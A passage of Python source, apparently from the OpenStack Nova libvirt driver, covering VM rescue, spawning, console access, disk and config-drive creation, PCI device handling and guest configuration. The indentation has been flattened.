'ramdisk_id': (CONF.libvirt.rescue_ramdisk_id or
instance.ramdisk_id),
}
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
None,
image_meta,
rescue=True)
self._create_image(context, instance,
disk_info['mapping'],
'.rescue', rescue_images,
network_info=network_info,
admin_pass=rescue_password)
xml = self._get_guest_xml(context, instance, network_info, disk_info,
image_meta, rescue=rescue_images,
write_to_disk=True)
self._destroy(instance)
self._create_domain(xml)
def unrescue(self, instance, network_info):
"""Reboot the VM which is being rescued back into primary images.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
xml = libvirt_utils.load_file(unrescue_xml_path)
virt_dom = self._lookup_by_name(instance.name)
self._destroy(instance)
self._create_domain(xml, virt_dom)
libvirt_utils.file_delete(unrescue_xml_path)
rescue_files = os.path.join(instance_dir, "*.rescue")
for rescue_file in glob.iglob(rescue_files):
libvirt_utils.file_delete(rescue_file)
def poll_rebooting_instances(self, timeout, instances):
pass
def _enable_hairpin(self, xml):
interfaces = self._get_interfaces(xml)
for interface in interfaces:
utils.execute('tee',
'/sys/class/net/%s/brport/hairpin_mode' % interface,
process_input='1',
run_as_root=True,
check_exit_code=[0, 1])
# NOTE(ilyaalekseyev): Implementation like in multinics
# for xenapi(tr3buchet)
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info,
image_meta)
self._create_image(context, instance,
disk_info['mapping'],
network_info=network_info,
block_device_info=block_device_info,
files=injected_files,
admin_pass=admin_password)
xml = self._get_guest_xml(context, instance, network_info,
disk_info, image_meta,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info)
LOG.debug("Instance is running", instance=instance)
def _wait_for_boot():
"""Called at an interval until the VM is running."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_LI("Instance spawned successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_boot)
timer.start(interval=0.5).wait()
def _flush_libvirt_console(self, pty):
out, err = utils.execute('dd',
'if=%s' % pty,
'iflag=nonblock',
run_as_root=True,
check_exit_code=False)
return out
def _append_to_file(self, data, fpath):
LOG.info(_LI('data: %(data)r, fpath: %(fpath)r'),
{'data': data, 'fpath': fpath})
with open(fpath, 'a+') as fp:
fp.write(data)
return fpath
def get_console_output(self, context, instance):
virt_dom = self._lookup_by_name(instance.name)
xml = virt_dom.XMLDesc(0)
tree = etree.fromstring(xml)
console_types = {}
# NOTE(comstud): We want to try 'file' types first, then try 'pty'
# types. We can't use Python 2.7 syntax of:
# tree.find("./devices/console[@type='file']/source")
# because we need to support 2.6.
console_nodes = tree.findall('./devices/console')
for console_node in console_nodes:
console_type = console_node.get('type')
console_types.setdefault(console_type, [])
console_types[console_type].append(console_node)
# If the guest has a console logging to a file prefer to use that
if console_types.get('file'):
for file_console in console_types.get('file'):
source_node = file_console.find('./source')
if source_node is None:
continue
path = source_node.get("path")
if not path:
continue
libvirt_utils.chown(path, os.getuid())
with libvirt_utils.file_open(path, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp,
MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_LI('Truncated console log returned, '
'%d bytes ignored'), remaining,
instance=instance)
return log_data
# Try 'pty' types
if console_types.get('pty'):
for pty_console in console_types.get('pty'):
source_node = pty_console.find('./source')
if source_node is None:
continue
pty = source_node.get("path")
if not pty:
continue
break
else:
msg = _("Guest does not have a console available")
raise exception.NovaException(msg)
self._chown_console_log_for_instance(instance)
data = self._flush_libvirt_console(pty)
console_log = self._get_console_log_path(instance)
fpath = self._append_to_file(data, console_log)
with libvirt_utils.file_open(fpath, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp, MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_LI('Truncated console log returned, '
'%d bytes ignored'),
remaining, instance=instance)
return log_data
@staticmethod
def get_host_ip_addr():
return CONF.my_ip
def get_vnc_console(self, context, instance):
def get_vnc_port_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
dom = xmlutils.safe_minidom_parse_string(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'vnc':
return graphic.getAttribute('port')
# NOTE(rmk): We had VNC consoles enabled but the instance in
# question is not actually listening for connections.
raise exception.ConsoleTypeUnavailable(console_type='vnc')
port = get_vnc_port_for_instance(instance.name)
host = CONF.vncserver_proxyclient_address
return {'host': host, 'port': port, 'internal_access_path': None}
def get_spice_console(self, context, instance):
def get_spice_ports_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
# TODO(sleepsonthefloor): use etree instead of minidom
dom = xmlutils.safe_minidom_parse_string(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'spice':
return (graphic.getAttribute('port'),
graphic.getAttribute('tlsPort'))
# NOTE(rmk): We had Spice consoles enabled but the instance in
# question is not actually listening for connections.
raise exception.ConsoleTypeUnavailable(console_type='spice')
ports = get_spice_ports_for_instance(instance['name'])
host = CONF.spice.server_proxyclient_address
return {'host': host, 'port': ports[0],
'tlsPort': ports[1], 'internal_access_path': None}
@staticmethod
def _supports_direct_io(dirpath):
if not hasattr(os, 'O_DIRECT'):
LOG.debug("This python runtime does not support direct I/O")
return False
testfile = os.path.join(dirpath, ".directio.test")
hasDirectIO = True
try:
f = os.open(testfile, os.O_CREAT | os.O_WRONLY | os.O_DIRECT)
# Check is the write allowed with 512 byte alignment
align_size = 512
m = mmap.mmap(-1, align_size)
m.write(r"x" * align_size)
os.write(f, m)
os.close(f)
LOG.debug("Path '%(path)s' supports direct I/O",
{'path': dirpath})
except OSError as e:
if e.errno == errno.EINVAL:
LOG.debug("Path '%(path)s' does not support direct I/O: "
"'%(ex)s'", {'path': dirpath, 'ex': str(e)})
hasDirectIO = False
else:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error on '%(path)s' while checking "
"direct I/O: '%(ex)s'"),
{'path': dirpath, 'ex': str(e)})
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error on '%(path)s' while checking direct I/O: "
"'%(ex)s'"), {'path': dirpath, 'ex': str(e)})
finally:
try:
os.unlink(testfile)
except Exception:
pass
return hasDirectIO
@staticmethod
def _create_local(target, local_size, unit='G',
fs_format=None, label=None):
"""Create a blank image of specified size."""
libvirt_utils.create_image('raw', target,
'%d%c' % (local_size, unit))
def _create_ephemeral(self, target, ephemeral_size,
fs_label, os_type, is_block_dev=False,
max_size=None, specified_fs=None):
if not is_block_dev:
self._create_local(target, ephemeral_size)
# Run as root only for block devices.
disk.mkfs(os_type, fs_label, target, run_as_root=is_block_dev,
specified_fs=specified_fs)
@staticmethod
def _create_swap(target, swap_mb, max_size=None):
"""Create a swap file of specified size."""
libvirt_utils.create_image('raw', target, '%dM' % swap_mb)
utils.mkfs('swap', target)
@staticmethod
def _get_console_log_path(instance):
return os.path.join(libvirt_utils.get_instance_path(instance),
'console.log')
@staticmethod
def _get_disk_config_path(instance, suffix=''):
return os.path.join(libvirt_utils.get_instance_path(instance),
'disk.config' + suffix)
def _chown_console_log_for_instance(self, instance):
console_log = self._get_console_log_path(instance)
if os.path.exists(console_log):
libvirt_utils.chown(console_log, os.getuid())
def _chown_disk_config_for_instance(self, instance):
disk_config = self._get_disk_config_path(instance)
if os.path.exists(disk_config):
libvirt_utils.chown(disk_config, os.getuid())
@staticmethod
def _is_booted_from_volume(instance, disk_mapping):
"""Determines whether the VM is booting from volume
Determines whether the disk mapping indicates that the VM
is booting from a volume.
"""
return ((not bool(instance.get('image_ref')))
or 'disk' not in disk_mapping)
def _inject_data(self, instance, network_info, admin_pass, files, suffix):
"""Injects data in a disk image
Helper used for injecting data in a disk image file system.
Keyword arguments:
instance -- a dict that refers instance specifications
network_info -- a dict that refers network speficications
admin_pass -- a string used to set an admin password
files -- a list of files needs to be injected
suffix -- a string used as an image name suffix
"""
# Handles the partition need to be used.
target_partition = None
if not instance['kernel_id']:
target_partition = CONF.libvirt.inject_partition
if target_partition == 0:
target_partition = None
if CONF.libvirt.virt_type == 'lxc':
target_partition = None
# Handles the key injection.
if CONF.libvirt.inject_key and instance.get('key_data'):
key = str(instance['key_data'])
else:
key = None
# Handles the admin password injection.
if not CONF.libvirt.inject_password:
admin_pass = None
# Handles the network injection.
net = netutils.get_injected_network_template(
network_info, libvirt_virt_type=CONF.libvirt.virt_type)
# Handles the metadata injection
metadata = instance.get('metadata')
image_type = CONF.libvirt.images_type
if any((key, net, metadata, admin_pass, files)):
injection_image = self.image_backend.image(
instance,
'disk' + suffix,
image_type)
img_id = instance['image_ref']
if not injection_image.check_image_exists():
LOG.warn(_LW('Image %s not found on disk storage. '
'Continue without injecting data'),
injection_image.path, instance=instance)
return
try:
disk.inject_data(injection_image.path,
key, net, metadata, admin_pass, files,
partition=target_partition,
use_cow=CONF.use_cow_images,
mandatory=('files',))
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error injecting data into image '
'%(img_id)s (%(e)s)'),
{'img_id': img_id, 'e': e},
instance=instance)
def _create_image(self, context, instance,
disk_mapping, suffix='',
disk_images=None, network_info=None,
block_device_info=None, files=None,
admin_pass=None, inject_files=True):
if not suffix:
suffix = ''
booted_from_volume = self._is_booted_from_volume(
instance, disk_mapping)
def image(fname, image_type=CONF.libvirt.images_type):
return self.image_backend.image(instance,
fname + suffix, image_type)
def raw(fname):
return image(fname, image_type='raw')
# ensure directories exist and are writable
fileutils.ensure_tree(libvirt_utils.get_instance_path(instance))
LOG.info(_LI('Creating image'), instance=instance)
# NOTE(dprince): for rescue console.log may already exist... chown it.
self._chown_console_log_for_instance(instance)
# NOTE(yaguang): For evacuate disk.config already exist in shared
# storage, chown it.
self._chown_disk_config_for_instance(instance)
# NOTE(vish): No need add the suffix to console.log
libvirt_utils.write_to_file(
self._get_console_log_path(instance), '', 7)
if not disk_images:
disk_images = {'image_id': instance['image_ref'],
'kernel_id': instance['kernel_id'],
'ramdisk_id': instance['ramdisk_id']}
if disk_images['kernel_id']:
fname = imagecache.get_cache_fname(disk_images, 'kernel_id')
raw('kernel').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['kernel_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
if disk_images['ramdisk_id']:
fname = imagecache.get_cache_fname(disk_images, 'ramdisk_id')
raw('ramdisk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['ramdisk_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
inst_type = flavors.extract_flavor(instance)
# NOTE(ndipanov): Even if disk_mapping was passed in, which
# currently happens only on rescue - we still don't want to
# create a base image.
if not booted_from_volume:
root_fname = imagecache.get_cache_fname(disk_images, 'image_id')
size = instance['root_gb'] * units.Gi
if size == 0 or suffix == '.rescue':
size = None
backend = image('disk')
if backend.SUPPORTS_CLONE:
def clone_fallback_to_fetch(*args, **kwargs):
try:
backend.clone(context, disk_images['image_id'])
except exception.ImageUnacceptable:
libvirt_utils.fetch_image(*args, **kwargs)
fetch_func = clone_fallback_to_fetch
else:
fetch_func = libvirt_utils.fetch_image
backend.cache(fetch_func=fetch_func,
context=context,
filename=root_fname,
size=size,
image_id=disk_images['image_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
# Lookup the filesystem type if required
os_type_with_default = disk.get_fs_type_for_os_type(
instance['os_type'])
ephemeral_gb = instance['ephemeral_gb']
if 'disk.local' in disk_mapping:
disk_image = image('disk.local')
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral0',
os_type=instance["os_type"],
is_block_dev=disk_image.is_block_dev)
fname = "ephemeral_%s_%s" % (ephemeral_gb, os_type_with_default)
size = ephemeral_gb * units.Gi
disk_image.cache(fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=ephemeral_gb)
for idx, eph in enumerate(driver.block_device_info_get_ephemerals(
block_device_info)):
disk_image = image(blockinfo.get_eph_disk(idx))
specified_fs = eph.get('guest_format')
if specified_fs and not self.is_supported_fs_format(specified_fs):
msg = _("%s format is not supported") % specified_fs
raise exception.InvalidBDMFormat(details=msg)
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral%d' % idx,
os_type=instance["os_type"],
is_block_dev=disk_image.is_block_dev)
size = eph['size'] * units.Gi
fname = "ephemeral_%s_%s" % (eph['size'], os_type_with_default)
disk_image.cache(
fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=eph['size'],
specified_fs=specified_fs)
if 'disk.swap' in disk_mapping:
mapping = disk_mapping['disk.swap']
swap_mb = 0
swap = driver.block_device_info_get_swap(block_device_info)
if driver.swap_is_usable(swap):
swap_mb = swap['swap_size']
elif (inst_type['swap'] > 0 and
not block_device.volume_in_mapping(
mapping['dev'], block_device_info)):
swap_mb = inst_type['swap']
if swap_mb > 0:
size = swap_mb * units.Mi
image('disk.swap').cache(fetch_func=self._create_swap,
filename="swap_%s" % swap_mb,
size=size,
swap_mb=swap_mb)
# Config drive
if configdrive.required_by(instance):
LOG.info(_LI('Using config drive'), instance=instance)
extra_md = {}
if admin_pass:
extra_md['admin_pass'] = admin_pass
inst_md = instance_metadata.InstanceMetadata(instance,
content=files, extra_md=extra_md, network_info=network_info)
with configdrive.ConfigDriveBuilder(instance_md=inst_md) as cdb:
configdrive_path = self._get_disk_config_path(instance, suffix)
LOG.info(_LI('Creating config drive at %(path)s'),
{'path': configdrive_path}, instance=instance)
try:
cdb.make_drive(configdrive_path)
except processutils.ProcessExecutionError as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Creating config drive failed '
'with error: %s'),
e, instance=instance)
def dummy_fetch_func(target, *args, **kwargs):
# NOTE(sileht): this is never called because the
# the target have already been created by
# cdb.make_drive call
pass
raw('disk.config').cache(fetch_func=dummy_fetch_func,
context=context,
filename='disk.config' + suffix)
# File injection only if needed
elif inject_files and CONF.libvirt.inject_partition != -2:
if booted_from_volume:
LOG.warn(_LW('File injection into a boot from volume '
'instance is not supported'), instance=instance)
self._inject_data(
instance, network_info, admin_pass, files, suffix)
if CONF.libvirt.virt_type == 'uml':
libvirt_utils.chown(image('disk').path, 'root')
def _prepare_pci_devices_for_use(self, pci_devices):
# kvm , qemu support managed mode
# In managed mode, the configured device will be automatically
# detached from the host OS drivers when the guest is started,
# and then re-attached when the guest shuts down.
if CONF.libvirt.virt_type != 'xen':
# we do manual detach only for xen
return
try:
for dev in pci_devices:
libvirt_dev_addr = dev['hypervisor_name']
libvirt_dev = \
self._conn.nodeDeviceLookupByName(libvirt_dev_addr)
# Note(yjiang5) Spelling for 'dettach' is correct, see
# http://libvirt.org/html/libvirt-libvirt.html.
libvirt_dev.dettach()
# Note(yjiang5): A reset of one PCI device may impact other
# devices on the same bus, thus we need two separated loops
# to detach and then reset it.
for dev in pci_devices:
libvirt_dev_addr = dev['hypervisor_name']
libvirt_dev = \
self._conn.nodeDeviceLookupByName(libvirt_dev_addr)
libvirt_dev.reset()
except libvirt.libvirtError as exc:
raise exception.PciDevicePrepareFailed(id=dev['id'],
instance_uuid=
dev['instance_uuid'],
reason=str(exc))
def _detach_pci_devices(self, dom, pci_devs):
# for libvirt version < 1.1.1, this is race condition
# so forbid detach if not had this version
if not self._has_min_version(MIN_LIBVIRT_DEVICE_CALLBACK_VERSION):
if pci_devs:
reason = (_("Detaching PCI devices with libvirt < %(ver)s"
" is not permitted") %
{'ver': MIN_LIBVIRT_DEVICE_CALLBACK_VERSION})
raise exception.PciDeviceDetachFailed(reason=reason,
dev=pci_devs)
try:
for dev in pci_devs:
dom.detachDeviceFlags(self._get_guest_pci_device(dev).to_xml(),
libvirt.VIR_DOMAIN_AFFECT_LIVE)
# after detachDeviceFlags returned, we should check the dom to
# ensure the detaching is finished
xml = dom.XMLDesc(0)
xml_doc = etree.fromstring(xml)
guest_config = vconfig.LibvirtConfigGuest()
guest_config.parse_dom(xml_doc)
for hdev in [d for d in guest_config.devices
if isinstance(d, vconfig.LibvirtConfigGuestHostdevPCI)]:
hdbsf = [hdev.domain, hdev.bus, hdev.slot, hdev.function]
dbsf = pci_utils.parse_address(dev['address'])
if [int(x, 16) for x in hdbsf] ==\
[int(x, 16) for x in dbsf]:
raise exception.PciDeviceDetachFailed(reason=
"timeout",
dev=dev)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_LW("Instance disappeared while detaching "
"a PCI device from it."))
else:
raise
def _attach_pci_devices(self, dom, pci_devs):
try:
for dev in pci_devs:
dom.attachDevice(self._get_guest_pci_device(dev).to_xml())
except libvirt.libvirtError:
LOG.error(_LE('Attaching PCI devices %(dev)s to %(dom)s failed.'),
{'dev': pci_devs, 'dom': dom.ID()})
raise
def _set_host_enabled(self, enabled,
disable_reason=DISABLE_REASON_UNDEFINED):
"""Enables / Disables the compute service on this host.
This doesn't override non-automatic disablement with an automatic
setting; thereby permitting operators to keep otherwise
healthy hosts out of rotation.
"""
status_name = {True: 'disabled',
False: 'enabled'}
disable_service = not enabled
ctx = nova_context.get_admin_context()
try:
service = objects.Service.get_by_compute_host(ctx, CONF.host)
if service.disabled != disable_service:
# Note(jang): this is a quick fix to stop operator-
# disabled compute hosts from re-enabling themselves
# automatically. We prefix any automatic reason code
# with a fixed string. We only re-enable a host
# automatically if we find that string in place.
# This should probably be replaced with a separate flag.
if not service.disabled or (
service.disabled_reason and
service.disabled_reason.startswith(DISABLE_PREFIX)):
service.disabled = disable_service
service.disabled_reason = (
DISABLE_PREFIX + disable_reason
if disable_service else DISABLE_REASON_UNDEFINED)
service.save()
LOG.debug('Updating compute service status to %s',
status_name[disable_service])
else:
LOG.debug('Not overriding manual compute service '
'status with: %s',
status_name[disable_service])
except exception.ComputeHostNotFound:
LOG.warn(_LW('Cannot update service status on host: %s,'
'since it is not registered.'), CONF.host)
except Exception:
LOG.warn(_LW('Cannot update service status on host: %s,'
'due to an unexpected exception.'), CONF.host,
exc_info=True)
def _get_host_capabilities(self):
"""Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
"""
if not self._caps:
xmlstr = self._conn.getCapabilities()
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
if hasattr(libvirt, 'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES'):
try:
features = self._conn.baselineCPU(
[self._caps.host.cpu.to_xml()],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
# FIXME(wangpan): the return value of baselineCPU should be
# None or xml string, but libvirt has a bug
# of it from 1.1.2 which is fixed in 1.2.0,
# this -1 checking should be removed later.
if features and features != -1:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warn(_LW("URI %(uri)s does not support full set"
" of host capabilities: " "%(error)s"),
{'uri': self.uri(), 'error': ex})
else:
raise
return self._caps
def _get_host_uuid(self):
"""Returns a UUID representing the host."""
caps = self._get_host_capabilities()
return caps.host.uuid
def _get_guest_cpu_model_config(self):
mode = CONF.libvirt.cpu_mode
model = CONF.libvirt.cpu_model
if (CONF.libvirt.virt_type == "kvm" or
CONF.libvirt.virt_type == "qemu"):
if mode is None:
mode = "host-model"
if mode == "none":
return vconfig.LibvirtConfigGuestCPU()
else:
if mode is None or mode == "none":
return None
if ((CONF.libvirt.virt_type != "kvm" and
CONF.libvirt.virt_type != "qemu")):
msg = _("Config requested an explicit CPU model, but "
"the current libvirt hypervisor '%s' does not "
"support selecting CPU models") % CONF.libvirt.virt_type
raise exception.Invalid(msg)
if mode == "custom" and model is None:
msg = _("Config requested a custom CPU model, but no "
"model name was provided")
raise exception.Invalid(msg)
elif mode != "custom" and model is not None:
msg = _("A CPU model name should not be set when a "
"host CPU model is requested")
raise exception.Invalid(msg)
LOG.debug("CPU mode '%(mode)s' model '%(model)s' was chosen",
{'mode': mode, 'model': (model or "")})
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.mode = mode
cpu.model = model
return cpu
def _get_guest_cpu_config(self, flavor, image):
cpu = self._get_guest_cpu_model_config()
if cpu is None:
return None
topology = hardware.VirtCPUTopology.get_best_config(flavor,
image)
cpu.sockets = topology.sockets
cpu.cores = topology.cores
cpu.threads = topology.threads
return cpu
def _get_guest_disk_config(self, instance, name, disk_mapping, inst_type,
image_type=None):
image = self.image_backend.image(instance,
name,
image_type)
disk_info = disk_mapping[name]
return image.libvirt_info(disk_info['bus'],
disk_info['dev'],
disk_info['type'],
self.disk_cachemode,
inst_type['extra_specs'],
self._get_hypervisor_version())
def _get_guest_storage_config(self, instance, image_meta,
disk_info,
rescue, block_device_info,
inst_type):
devices = []
disk_mapping = disk_info['mapping']
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
if CONF.libvirt.virt_type == "lxc":
fs = vconfig.LibvirtConfigGuestFilesys()
fs.source_type = "mount"
fs.source_dir = os.path.join(
libvirt_utils.get_instance_path(instance), 'rootfs')
devices.append(fs)
else:
if rescue:
diskrescue = self._get_guest_disk_config(instance,
'disk.rescue',
disk_mapping,
inst_type)
devices.append(diskrescue)
diskos = self._get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
else:
if 'disk' in disk_mapping:
diskos = self._get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
if 'disk.local' in disk_mapping:
disklocal = self._get_guest_disk_config(instance,
'disk.local',
disk_mapping,
inst_type)
devices.append(disklocal)
instance.default_ephemeral_device = (
block_device.prepend_dev(disklocal.target_dev))
instance.save()
for idx, eph in enumerate(
driver.block_device_info_get_ephemerals(
block_device_info)):
diskeph = self._get_guest_disk_config(
instance,
blockinfo.get_eph_disk(idx),
disk_mapping, inst_type)
devices.append(diskeph)
if 'disk.swap' in disk_mapping:
diskswap = self._get_guest_disk_config(instance,
'disk.swap',
disk_mapping,
inst_type)
devices.append(diskswap)
instance.default_swap_device = (
block_device.prepend_dev(diskswap.target_dev))
instance.save()
for vol in block_device_mapping:
connection_info = vol['connection_info']
vol_dev = block_device.prepend_dev(vol['mount_device'])
info = disk_mapping[vol_dev]
cfg = self._connect_volume(connection_info, info)
devices.append(cfg)
vol['connection_info'] = connection_info
vol.save()
if 'disk.config' in disk_mapping:
# NOTE(sileht): a configdrive is a raw image
# it works well with rbd, lvm and raw images_type
# but we must force to raw image_type if the desired
# images_type is qcow2
if CONF.libvirt.images_type not in ['rbd', 'lvm']:
image_type = "raw"
else:
image_type = None
diskconfig = self._get_guest_disk_config(instance,
'disk.config',
disk_mapping,
inst_type,
image_type)
devices.append(diskconfig)
for d in devices:
self._set_cache_mode(d)
if (image_meta and
image_meta.get('properties', {}).get('hw_scsi_model')):
hw_scsi_model = image_meta['properties']['hw_scsi_model']
scsi_controller = vconfig.LibvirtConfigGuestController()
scsi_controller.type = 'scsi'
scsi_controller.model = hw_scsi_model
devices.append(scsi_controller)
return devices
def _get_host_sysinfo_serial_hardware(self):
"""Get a UUID from the host hardware
Get a UUID for the host hardware reported by libvirt.
This is typically from the SMBIOS data, unless it has
been overridden in /etc/libvirt/libvirtd.conf
"""
return self._get_host_uuid()
def _get_host_sysinfo_serial_os(self):
"""Get a UUID from the host operating system
Get a UUID for the host operating system. Modern Linux
distros based on systemd provide a /etc/machine-id
file containing a UUID. This is also provided inside
systemd based containers and can be provided by other
init systems too, since it is just a plain text file.
"""
with open("/etc/machine-id") as f:
# We want to have '-' in the right place
# so we parse & reformat the value
return str(uuid.UUID(f.read().split()[0]))
def _get_host_sysinfo_serial_auto(self):
if os.path.exists("/etc/machine-id"):
return self._get_host_sysinfo_serial_os()
else:
return self._get_host_sysinfo_serial_hardware()
def _get_guest_config_sysinfo(self, instance):
sysinfo = vconfig.LibvirtConfigGuestSysinfo()
sysinfo.system_manufacturer = version.vendor_string()
sysinfo.system_product = version.product_string()
sysinfo.system_version = version.version_string_with_package()
sysinfo.system_serial = self._sysinfo_serial_func()
sysinfo.system_uuid = instance['uuid']
return sysinfo
def _get_guest_pci_device(self, pci_device):
dbsf = pci_utils.parse_address(pci_device['address'])
dev = vconfig.LibvirtConfigGuestHostdevPCI()
dev.domain, dev.bus, dev.slot, dev.function = dbsf
# only kvm support managed mode
if CONF.libvirt.virt_type in ('xen',):
dev.managed = 'no'
if CONF.libvirt.virt_type in ('kvm', 'qemu'):
dev.managed = 'yes'
return dev
def _get_guest_config_meta(self, context, instance, flavor):
"""Get metadata config for guest."""
meta = vconfig.LibvirtConfigGuestMetaNovaInstance()
meta.package = version.version_string_with_package()
meta.name = instance["display_name"]
meta.creationTime = time.time()
if instance["image_ref"] not in ("", None):
meta.roottype = "image"
meta.rootid = instance["image_ref"]
if context is not None:
ometa = vconfig.LibvirtConfigGuestMetaNovaOwner()
ometa.userid = context.user_id
ometa.username = context.user_name
ometa.projectid = context.project_id
ometa.projectname = context.project_name
meta.owner = ometa
fmeta = vconfig.LibvirtConfigGuestMetaNovaFlavor()
fmeta.name = flavor.name
fmeta.memory = flavor.memory_mb
fmeta.vcpus = flavor.vcpus
fmeta.ephemeral = flavor.ephemeral_gb
fmeta.disk = flavor.root_gb
fmeta.swap = flavor.swap
meta.flavor = fmeta
return meta
def _machine_type_mappings(self):
mappings = {}
for mapping in CONF.libvirt.hw_machine_type:
host_arch, _, machine_type = mapping.partition('=')
mappings[host_arch] = machine_type
return mappings
def _get_machine_type(self, image_meta, caps):
# The underlying machine type can be set as an image attribute,
# or otherwise based on some architecture specific defaults
mach_type = None
if (image_meta is not None and image_meta.get('properties') and
image_meta['properties'].get('hw_machine_type')
is not None):
mach_type = image_meta['properties']['hw_machine_type']
else:
# For ARM systems we will default to vexpress-a15 for armv7
# and virt for aarch64
if caps.host.cpu.arch == "armv7l":
mach_type = "vexpress-a15"
if caps.host.cpu.arch == "aarch64":
mach_type = "virt"
# If set in the config, use that as the default.
if CONF.libvirt.hw_machine_type:
mappings = self._machine_type_mappings()
mach_type = mappings.get(caps.host.cpu.arch)
return mach_type
def _get_guest_config(self, instance, network_info, image_meta,
disk_info, rescue=None, block_device_info=None,
context=None):
"""Get config data for parameters.
:param rescue: optional dictionary that should contain the key
'ramdisk_id' if a ramdisk is needed for the rescue image and
'kernel_id' if a kernel is needed for the rescue image.
"""
flavor = objects.Flavor.get_by_id(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
inst_path = libvirt_utils.get_instance_path(instance)
disk_mapping = disk_info['mapping']
img_meta_prop = image_meta.get('properties', {}) if image_meta else {}
CONSOLE = "console=tty0 console=ttyS0"
guest = vconfig.LibvirtConfigGuest()
guest.virt_type = CONF.libvirt.virt_type
guest.name = instance['name']
guest.uuid = instance['uuid']
# We are using default unit for memory: KiB
guest.memory = flavor.memory_mb * units.Ki
guest.vcpus = flavor.vcpus
guest.cpuset = hardware.get_vcpu_pin_set()
guest.metadata.append(self._get_guest_config_meta(context,
instance,
flavor))
cputuning = ['shares', 'period', 'quota']
for name in cputuning:
key = "quota:cpu_" + name
if key in flavor.extra_specs:
if guest.cputune is None:
guest.cputune = vconfig.LibvirtConfigGuestCPUTune()
setattr(guest.cputune, name,
int(flavor.extra_specs[key]))
guest.cpu = self._get_guest_cpu_config(flavor, image_meta)
if 'root' in disk_mapping:
root_device_name = block_device.prepend_dev(
disk_mapping['root']['dev'])
else:
root_device_name = None
if root_device_name:
# NOTE(yamahata):
# for nova.api.ec2.cloud.CloudController.get_metadata()
instance.root_device_name = root_device_name
instance.save()
guest.os_type = vm_mode.get_from_instance(instance)
if guest.os_type is None:
if CONF.libvirt.virt_type == "lxc":
guest.os_type = vm_mode.EXE
elif CONF.libvirt.virt_type == "uml":
guest.os_type = vm_mode.UML
elif CONF.libvirt.virt_type == "xen":
guest.os_type = vm_mode.XEN
else:
guest.os_type = vm_mode.HVM
if CONF.libvirt.virt_type == "xen" and guest.os_type == vm_mode.HVM:
guest.os_loader = CONF.libvirt.xen_hvmloader_path
if CONF.libvirt.virt_type in ("kvm", "qemu"):
caps = self._get_host_capabilities()
if caps.host.cpu.arch in ("i686", "x86_64"):
guest.sysinfo = self._get_guest_config_sysinfo(instance)
guest.os_smbios = vconfig.LibvirtConfigGuestSMBIOS()
guest.os_mach_type = self._get_machine_type(image_meta, caps)
if CONF.libvirt.virt_type == "lxc":
guest.os_init_path = "/sbin/init"
guest.os_cmdline = CONSOLE
elif CONF.libvirt.virt_type == "uml":
guest.os_kernel = "/usr/bin/linux"
guest.os_root = root_device_name
else:
if rescue:
if rescue.get('kernel_id'):
guest.os_kernel = os.path.join(inst_path, "kernel.rescue")
if CONF.libvirt.virt_type == "xen":
guest.os_cmdline = "ro root=%s" % root_device_name
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if CONF.libvirt.virt_type == "qemu":
guest.os_cmdline += " no_timer_check"
if rescue.get('ramdisk_id'):
guest.os_initrd = os.path.join(inst_path, "ramdisk.rescue")
elif instance['kernel_id']:
guest.os_kernel = os.path.join(inst_path, "kernel")
if CONF.libvirt.virt_type == "xen":
guest.os_cmdline = "ro root=%s" % root_device_name
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if CONF.libvirt.virt_type == "qemu":
guest.os_cmdline += " no_timer_check"
if instance['ramdisk_id']:
guest.os_initrd = os.path.join(inst_path, "ramdisk")
